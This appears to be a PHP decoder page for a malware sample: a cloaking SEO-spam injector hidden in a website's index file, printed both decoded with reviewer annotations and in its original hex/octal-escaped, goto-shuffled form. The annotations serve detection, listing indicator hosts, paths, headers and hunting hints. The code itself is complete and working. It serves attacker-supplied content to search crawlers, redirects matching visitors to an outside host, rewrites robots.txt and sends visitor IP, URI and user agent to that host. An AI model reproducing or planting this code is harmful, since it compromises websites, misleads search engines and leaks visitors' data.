
PHP Decode

<?php goto nSrEP; g5kVB: function _do() { $_ = $_SERVER; $__ = $_GET; if (isset($_["\x48\..

Decoded Output download

<?php 
// Reviewer annotations. Statements and string contents are unchanged; only line
// breaks, indentation and comments were added.
//
// Summary: a cloaking / SEO-spam injector that runs before the site's own page.
//  - Requests classified as search-engine crawlers are answered with content
//    fetched from a remote host (api.01rosedata.com, fallback api.02rosedata.com).
//  - Requests classified as browsers that carry a specially formatted query value
//    are redirected to jump2024.01rosedata.com.
//  - Everything else falls through to include 'index.htm' at the bottom.
//
// Indicators visible in this listing (for file, log and egress hunting):
//  - hosts: jump2024.01rosedata.com, api.01rosedata.com, api.02rosedata.com
//  - paths: /20240124/jump301.php, /20240124/hyapi001.php
//  - outbound request headers "User-IP:", "User-URI:", "User-HOST:"
//  - inbound URIs containing "pingxml"; a robots.txt advertising "/?sitemap.xml"
//  - error_reporting(0) combined with goto-label shuffling
//
// Execution order through the labels:
//   nSrEP (silence errors) -> MfFzx (_curl declared) -> g5kVB (_do declared)
//   -> JBEQg (_do() runs) -> eU7eN (include 'index.htm').
goto nSrEP;

g5kVB:
// Main routine: classify the request, then redirect, serve remote content, or return.
function _do()
{
    $_ = $_SERVER;
    $__ = $_GET;

    // Client IP is taken from request headers first and REMOTE_ADDR only last.
    // These headers are client-supplied unless a trusted proxy overwrites them.
    if (isset($_["HTTP_CF_CONNECTING_IP"])) {
        $i = $_["HTTP_CF_CONNECTING_IP"];
    } elseif (isset($_["HTTP_X_FORWARDED_FOR"])) {
        $i = $_["HTTP_X_FORWARDED_FOR"];
    } elseif (isset($_["HTTP_CLIENT_IP"])) {
        $i = $_["HTTP_CLIENT_IP"];
    } elseif (isset($_["HTTP_X_REAL_IP"])) {
        $i = $_["HTTP_X_REAL_IP"];
    } else {
        $i = $_["REMOTE_ADDR"];
    }
    // Only the first comma-separated entry is used.
    $ips = explode(",", $i);
    $IP = $ips[0];

    // Crawler heuristic: User-Agent concatenated with the reverse-DNS name of $IP,
    // matched case-insensitively against search-engine names. Both inputs can be
    // influenced by the client, so this is a heuristic, not crawler verification.
    // Note the reverse lookup adds a DNS query to every request that reaches here.
    $UA = @$_["HTTP_USER_AGENT"] . @gethostbyaddr($IP);
    $Bot = preg_match("/(google|bing|yahoo|msn.com|yahoo.com|aol.com)/i", $UA) ? 1 : 0;
    $URI = $_["REQUEST_URI"];
    $Lang = @$_["HTTP_ACCEPT_LANGUAGE"];
    $Host = $_["HTTP_HOST"];

    // $Ukey: first three characters of the Host header after removing the letter
    // "w", digits, dots and hyphens. Constructed example: "www.example.com" -> "exa".
    // $sKey defaults to the first character of $Ukey (the default query-parameter name).
    $Ukey = substr(preg_replace("/[w0-9\.-]/", '', $Host), 0, 3);
    $sKey = substr($Ukey, 0, 1);
    $h7Page = '';

    // Three page-id formats recognised in query values:
    //   h7  : digit.digits.digits.digits.digits.
    //   h8  : <Ukey><digit>-<digits>-<digits>
    //   d10 : <Ukey><3 digits>c<digits>
    $h7Pre = "^[0-9]\.[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\.";
    $h8Pre = $Ukey . "[0-9]-[0-9]+-[0-9]+";
    $d10Pre = $Ukey . "[0-9][0-9][0-9]c[0-9]+";

    // Scan every GET parameter; the first value matching one of the formats decides
    // which parameter name ($sKey) carries the page id, or sets $h7Page.
    if (!empty($__)) {
        foreach ($__ as $k => $v) {
            if (preg_match("/^" . $h8Pre . "/", $v)) {
                $sKey = $k;
                break;
            }
            if (preg_match("/^" . $d10Pre . "/", $v)) {
                $sKey = $k;
                break;
            }
            if (preg_match("/" . $h7Pre . "/", $v)) {
                $h7Page = $v;
                break;
            }
        }
    }
    // $Path is never assigned anything else; it is sent as an empty "path=" value below.
    $Path = '';
    $Page = isset($__[$sKey]) ? trim($__[$sKey]) : '';

    // "pingxml" trigger: any URI containing that string makes the server submit a
    // sitemap URL for this host to Google's ping endpoint, echo the URL, and exit
    // with PING-1 / PING-0. Requests containing "pingxml" in access logs are a
    // sign that this hook is being exercised.
    if (strstr($URI, "pingxml")) {
        $spath = preg_replace("/\?.*$/", '', $URI);
        $mUrl = "https://www.google.com/ping?sitemap=http://" . $Host . $spath . "?sitemap" . rand(1, 99) . ".xml";
        echo $mUrl . "#";
        if (strstr(@file_get_contents($mUrl), "Received<")) {
            die("PING-1");
        }
        die("PING-0");
    }

    // Browser branch: UA+rDNS longer than 20 chars, Accept-Language present, and not
    // classified as a crawler. A matching page id causes a redirect off-site; the
    // Host header and the page id are passed along in the query string.
    if (strlen($UA) > 20 && !empty($Lang) && !$Bot) {
        if (preg_match("/^" . $h8Pre . "-[0-9]+-[0-9]+-[0-9]+/", $Page)) {
            header("Location: http://jump2024.01rosedata.com/20240124/jump301.php?t=e&hh=" . $Host . "&s=" . urlencode($Page));
            die;
        } elseif (preg_match("/^" . $d10Pre . "/", $Page)) {
            header("Location: http://jump2024.01rosedata.com/20240124/jump301.php?t=e&hh=" . $Host . "&s=" . urlencode($Page));
            die;
        } elseif (!empty($h7Page)) {
            header("Location: http://jump2024.01rosedata.com/20240124/jump301.php?t=e&hh=" . $Host . "&s=" . urlencode($h7Page));
            die;
        }
    }

    // URIs that look like static assets are left alone: return, so the include at
    // the bottom of the file serves the normal page.
    if (preg_match("/\.(jpg|gif|jpeg|png|ico|css|js|ini|log)/i", $URI)) {
        return;
    }

    // Crawler branch.
    if ($Bot) {
        if (substr($URI, -10) == "robots.txt") {
            // Replaces the site's robots.txt for crawlers with an allow-all policy
            // that points at the injected sitemap. The string below contains a raw
            // line break because the decoder expanded one newline escape in place.
            header("Content-Type: text/plain");
            die("User-agent: *" . "\xa" . "Allow: /" . "
\xa" . "Sitemap: http://" . $Host . "/?sitemap.xml");
        } elseif (preg_match("/sitemap[0-9]*\.xml/", $URI) || $Page == "sitemap") {
            // Sitemap requests are mapped to a fixed page id.
            $Page = $Ukey . "1-999-9";
        } elseif (!preg_match("/^" . $h8Pre . "/", $Page) && !preg_match("/^" . $d10Pre . "/", $Page)) {
            // Any other crawler request without a valid page id gets a default one,
            // so crawlers receive remote content for every non-asset URL.
            $Page = $Ukey . "1-999-1";
        }
        if (preg_match("/^" . $h8Pre . "/", $Page) || preg_match("/^" . $d10Pre . "/", $Page)) {
            // Host, URI, client IP and User-Agent are packed into one base64 value
            // and sent to the remote host with every fetch.
            $hd = base64_encode($Host . "{|}" . $URI . "{|}" . $IP . "{|}" . @$_["HTTP_USER_AGENT"]);
            // Primary and fallback domain fragments; _curl swaps [0] for [1] on retry.
            $cHost = array(".01rosedata.", ".02rosedata.");
            $cUrl = "http://api" . $cHost[0] . "com/20240124/hyapi001.php";
            // This branch assigns the same URL again; it has no effect as written.
            if (preg_match("/^" . $d10Pre . "/", $Page)) {
                $cUrl = "http://api" . $cHost[0] . "com/20240124/hyapi001.php";
            }
            // Index 2 carries the client IP into _curl for the "User-IP:" header.
            $cHost[2] = $IP;
            $html = _curl($cUrl . "?key=" . $sKey . "&path=" . $Path . "&s=" . urlencode($Page) . "&hd=" . urlencode($hd), $cHost);
            // The remote response is emitted verbatim: as XML when it contains a
            // closing urlset tag, otherwise whenever it is longer than 500 bytes.
            // Shorter responses fall through to the include below.
            if (strstr($html, "</urlset>")) {
                header("Content-type:text/xml");
                die($html);
            }
            if (strlen($html) > 500) {
                die($html);
            }
        }
    }
}
goto JBEQg;

JBEQg:
_do();
goto eU7eN;

MfFzx:
// Fetch helper: GET $u and return the body, retrying once against the fallback
// domain ($cHost[1]) when the first response is empty or not HTTP 200.
function _curl($u, $cHost, $n = 0)
{
    $_ = $_SERVER;
    if (!function_exists("curl_exec")) {
        // No cURL extension: plain stream GET with a 60 s timeout.
        $c = stream_context_create(array("http" => array("method" => "GET", "timeout" => 60)));
        $s = @file_get_contents($u, false, $c);
    } else {
        // The visitor's language, IP, URI and Host are forwarded in custom headers;
        // these header names are usable as an egress-proxy signature.
        $hd = array("Accept-Language:" . @$_["HTTP_ACCEPT_LANGUAGE"], "User-IP:" . $cHost[2], "User-URI:" . $_["REQUEST_URI"], "User-HOST:" . $_["HTTP_HOST"]);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $u);
        // The visitor's own User-Agent is replayed on the outbound request.
        curl_setopt($ch, CURLOPT_USERAGENT, @$_["HTTP_USER_AGENT"]);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $hd);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        // Peer verification is switched off; the URLs built in _do() are http://
        // anyway, so this traffic is cleartext and visible to network inspection.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 60);
        $s = curl_exec($ch);
        $a = curl_getinfo($ch);
        curl_close($ch);
        if ($a["http_code"] != "200") {
            $s = '';
        }
    }
    // $n limits the recursion to a single retry.
    if (empty($s) && $n < 1) {
        return _curl(str_replace($cHost[0], $cHost[1], $u), $cHost, 1);
    }
    return $s;
}
goto g5kVB;

nSrEP:
// First statement executed: suppress all PHP error output.
error_reporting(0);
goto MfFzx;

eU7eN:

// Reached whenever _do() returns without die(): presumably the site's real page,
// so ordinary visitors see normal content (confirm against the affected site).
include 'index.htm'; 
?>


Original Code

<?php
// Reviewer annotations. The code below is unchanged.
//
// Obfuscated form of the sample. Two layers are visible:
//  - every string literal is written as a mix of hex (\xNN) and octal (\NNN)
//    escapes inside double quotes, so plaintext searches for the host names,
//    header names or $_SERVER keys will not match this file on disk;
//  - the statements are shuffled behind goto labels (nSrEP, MfFzx, g5kVB, JBEQg,
//    eU7eN), so the textual order is not the execution order.
// There is no eval or decoder wrapper (the page's Stats section reports Eval Count 0);
// PHP resolves the escapes itself when it parses the file.
//
// Hunting hints that follow from this: look for index files that begin with a goto,
// contain error_reporting(0), and consist largely of backslash escape sequences,
// ending in an include of a static page. The page's "Decoded Output" listing shows
// the same statements with the escapes expanded.
goto nSrEP; g5kVB: function _do() { $_ = $_SERVER; $__ = $_GET; if (isset($_["\x48\x54\x54\120\x5f\x43\x46\x5f\x43\x4f\x4e\x4e\x45\103\124\x49\116\x47\x5f\111\x50"])) { $i = $_["\x48\x54\124\x50\x5f\103\106\137\103\117\116\x4e\x45\103\124\111\116\107\x5f\111\120"]; } elseif (isset($_["\110\x54\x54\x50\137\130\137\x46\x4f\x52\127\101\122\x44\x45\104\137\106\x4f\x52"])) { $i = $_["\110\x54\124\120\137\130\x5f\106\117\x52\x57\x41\122\x44\105\x44\x5f\106\x4f\x52"]; } elseif (isset($_["\x48\x54\124\120\x5f\x43\x4c\111\105\116\124\137\x49\x50"])) { $i = $_["\x48\124\124\x50\137\103\x4c\x49\x45\x4e\124\137\111\x50"]; } elseif (isset($_["\110\124\x54\120\137\x58\x5f\122\105\101\114\x5f\111\120"])) { $i = $_["\110\124\124\x50\137\130\x5f\x52\x45\x41\x4c\137\111\x50"]; } else { $i = $_["\122\105\115\117\x54\105\x5f\101\104\104\122"]; } $ips = explode("\x2c", $i); $IP = $ips[0]; $UA = @$_["\x48\x54\124\120\137\125\123\x45\122\x5f\101\x47\105\x4e\x54"] . @gethostbyaddr($IP); $Bot = preg_match("\x2f\x28\x67\x6f\157\147\x6c\x65\x7c\142\x69\156\x67\x7c\x79\x61\x68\x6f\x6f\x7c\x6d\x73\x6e\56\x63\x6f\x6d\174\171\x61\x68\157\x6f\56\x63\157\x6d\174\x61\x6f\154\56\143\x6f\155\51\x2f\151", $UA) ? 1 : 0; $URI = $_["\x52\105\121\x55\105\123\x54\x5f\x55\x52\x49"]; $Lang = @$_["\x48\124\124\x50\137\101\103\103\x45\120\124\137\114\101\x4e\x47\125\101\x47\105"]; $Host = $_["\x48\124\x54\120\x5f\x48\x4f\123\124"]; $Ukey = substr(preg_replace("\57\x5b\x77\60\55\x39\x5c\56\55\x5d\57", '', $Host), 0, 3); $sKey = substr($Ukey, 0, 1); $h7Page = ''; $h7Pre = "\136\133\60\55\71\x5d\x5c\56\x5b\x30\x2d\71\x5d\53\134\x2e\133\x30\55\71\135\x2b\134\56\133\60\x2d\x39\x5d\53\134\x2e\133\60\55\71\135\x2b\134\56"; $h8Pre = $Ukey . "\133\60\x2d\x39\135\x2d\133\x30\x2d\x39\135\x2b\x2d\x5b\60\x2d\x39\135\53"; $d10Pre = $Ukey . "\133\60\55\x39\x5d\x5b\60\55\x39\x5d\133\x30\55\71\x5d\x63\x5b\x30\x2d\x39\x5d\53"; if (!empty($__)) { foreach ($__ as $k => $v) { if (preg_match("\57\x5e" . $h8Pre . 
"\57", $v)) { $sKey = $k; break; } if (preg_match("\57\x5e" . $d10Pre . "\x2f", $v)) { $sKey = $k; break; } if (preg_match("\57" . $h7Pre . "\x2f", $v)) { $h7Page = $v; break; } } } $Path = ''; $Page = isset($__[$sKey]) ? trim($__[$sKey]) : ''; if (strstr($URI, "\160\x69\x6e\x67\x78\155\154")) { $spath = preg_replace("\57\134\77\56\x2a\44\x2f", '', $URI); $mUrl = "\150\x74\164\x70\163\72\57\57\x77\167\167\x2e\x67\x6f\x6f\147\x6c\x65\x2e\143\157\155\57\160\151\156\x67\x3f\163\x69\x74\x65\x6d\141\x70\75\x68\x74\x74\160\x3a\x2f\x2f" . $Host . $spath . "\77\163\151\164\x65\155\x61\x70" . rand(1, 99) . "\x2e\170\x6d\x6c"; echo $mUrl . "\43"; if (strstr(@file_get_contents($mUrl), "\x52\145\x63\145\x69\x76\x65\x64\x3c")) { die("\120\111\116\107\x2d\61"); } die("\120\111\116\107\55\60"); } if (strlen($UA) > 20 && !empty($Lang) && !$Bot) { if (preg_match("\57\x5e" . $h8Pre . "\x2d\x5b\x30\x2d\x39\x5d\x2b\55\133\x30\x2d\71\135\x2b\55\133\60\x2d\71\x5d\x2b\x2f", $Page)) { header("\114\x6f\x63\x61\164\x69\157\156\x3a\40\150\x74\x74\160\x3a\x2f\57\x6a\x75\155\x70\62\x30\x32\x34\x2e\x30\61\x72\157\163\x65\x64\141\x74\141\56\143\157\155\57\x32\60\x32\64\x30\x31\x32\64\x2f\x6a\x75\155\160\63\60\61\x2e\160\150\x70\77\x74\x3d\x65\x26\x68\150\75" . $Host . "\x26\163\75" . urlencode($Page)); die; } elseif (preg_match("\57\x5e" . $d10Pre . "\57", $Page)) { header("\114\157\143\141\164\x69\157\156\72\40\x68\x74\x74\160\x3a\57\x2f\x6a\165\155\x70\x32\60\62\64\x2e\60\61\162\157\x73\x65\x64\141\x74\x61\56\143\157\x6d\x2f\x32\x30\x32\x34\60\x31\62\x34\x2f\152\x75\x6d\160\63\60\x31\x2e\x70\x68\x70\77\164\x3d\x65\x26\x68\150\75" . $Host . "\46\x73\75" . urlencode($Page)); die; } elseif (!empty($h7Page)) { header("\114\157\x63\x61\164\151\x6f\x6e\72\40\x68\164\164\160\72\57\x2f\152\165\x6d\160\x32\60\x32\x34\x2e\60\x31\162\157\163\x65\144\x61\164\x61\x2e\143\157\x6d\57\62\60\62\64\x30\61\x32\64\x2f\x6a\165\155\x70\x33\60\61\x2e\x70\150\160\77\x74\75\145\x26\x68\x68\x3d" . $Host . 
"\46\x73\x3d" . urlencode($h7Page)); die; } } if (preg_match("\x2f\134\x2e\x28\x6a\160\x67\174\x67\151\146\x7c\x6a\160\x65\147\174\160\156\x67\174\x69\x63\x6f\x7c\x63\163\163\x7c\x6a\163\174\151\156\151\174\x6c\x6f\x67\x29\x2f\x69", $URI)) { return; } if ($Bot) { if (substr($URI, -10) == "\162\x6f\x62\x6f\x74\163\56\x74\170\164") { header("\103\157\156\164\145\x6e\164\x2d\124\171\160\145\72\x20\x74\x65\x78\x74\x2f\160\154\x61\151\156"); die("\x55\x73\145\162\x2d\141\147\x65\x6e\164\x3a\40\x2a" . "\xa" . "\x41\x6c\154\157\x77\72\x20\57" . "\12\xa" . "\123\151\x74\x65\155\x61\160\72\x20\150\x74\x74\160\x3a\x2f\x2f" . $Host . "\57\77\163\151\164\145\x6d\141\x70\56\x78\x6d\154"); } elseif (preg_match("\x2f\163\x69\x74\x65\155\141\160\x5b\60\x2d\x39\x5d\x2a\x5c\x2e\170\x6d\154\57", $URI) || $Page == "\163\151\164\145\x6d\141\160") { $Page = $Ukey . "\61\55\71\71\x39\55\x39"; } elseif (!preg_match("\57\136" . $h8Pre . "\x2f", $Page) && !preg_match("\57\x5e" . $d10Pre . "\x2f", $Page)) { $Page = $Ukey . "\61\x2d\71\71\71\x2d\61"; } if (preg_match("\57\136" . $h8Pre . "\57", $Page) || preg_match("\x2f\x5e" . $d10Pre . "\57", $Page)) { $hd = base64_encode($Host . "\x7b\x7c\175" . $URI . "\x7b\174\175" . $IP . "\173\174\175" . @$_["\x48\x54\124\x50\137\x55\x53\105\x52\137\101\107\105\116\124"]); $cHost = array("\56\x30\61\x72\157\x73\145\x64\141\164\x61\56", "\56\60\x32\162\157\x73\145\144\141\164\x61\x2e"); $cUrl = "\150\164\164\160\72\57\57\141\160\x69" . $cHost[0] . "\143\157\155\x2f\x32\60\62\64\60\61\62\64\57\150\171\x61\160\x69\x30\60\x31\56\160\x68\160"; if (preg_match("\x2f\x5e" . $d10Pre . "\x2f", $Page)) { $cUrl = "\150\x74\164\x70\72\57\57\141\160\x69" . $cHost[0] . "\x63\157\x6d\x2f\x32\x30\x32\64\x30\x31\x32\64\x2f\150\171\x61\160\x69\60\60\61\x2e\x70\x68\160"; } $cHost[2] = $IP; $html = _curl($cUrl . "\77\153\145\171\x3d" . $sKey . "\46\160\141\164\x68\75" . $Path . "\46\x73\x3d" . urlencode($Page) . "\46\150\x64\75" . 
urlencode($hd), $cHost); if (strstr($html, "\74\57\165\x72\x6c\163\x65\164\76")) { header("\x43\157\156\164\145\156\x74\55\x74\171\160\145\72\x74\x65\x78\x74\57\x78\155\154"); die($html); } if (strlen($html) > 500) { die($html); } } } } goto JBEQg; JBEQg: _do(); goto eU7eN; MfFzx: function _curl($u, $cHost, $n = 0) { $_ = $_SERVER; if (!function_exists("\x63\x75\x72\154\137\x65\170\x65\x63")) { $c = stream_context_create(array("\150\164\x74\x70" => array("\x6d\145\x74\150\x6f\144" => "\x47\105\x54", "\164\x69\x6d\x65\157\165\x74" => 60))); $s = @file_get_contents($u, false, $c); } else { $hd = array("\x41\143\143\x65\160\164\x2d\114\141\156\x67\x75\141\x67\145\72" . @$_["\x48\124\x54\x50\x5f\101\103\103\105\120\x54\137\114\101\116\x47\125\101\107\x45"], "\x55\163\145\162\55\111\120\72" . $cHost[2], "\125\163\145\x72\x2d\125\122\x49\72" . $_["\x52\x45\x51\125\105\x53\x54\x5f\x55\122\x49"], "\x55\x73\x65\x72\x2d\110\x4f\x53\124\x3a" . $_["\x48\x54\124\x50\137\x48\117\123\x54"]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); curl_setopt($ch, CURLOPT_USERAGENT, @$_["\110\124\x54\x50\x5f\125\123\x45\122\x5f\101\x47\105\x4e\124"]); curl_setopt($ch, CURLOPT_HTTPHEADER, $hd); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $s = curl_exec($ch); $a = curl_getinfo($ch); curl_close($ch); if ($a["\x68\164\x74\160\137\143\157\x64\145"] != "\62\60\x30") { $s = ''; } } if (empty($s) && $n < 1) { return _curl(str_replace($cHost[0], $cHost[1], $u), $cHost, 1); } return $s; } goto g5kVB; nSrEP: error_reporting(0); goto MfFzx; eU7eN: 

include 'index.htm';
?>

Function Calls

None

Variables

None

Stats

MD5 e6c2f493c3edc9e2592af6ad54c59218
Eval Count 0
Decode Time 47 ms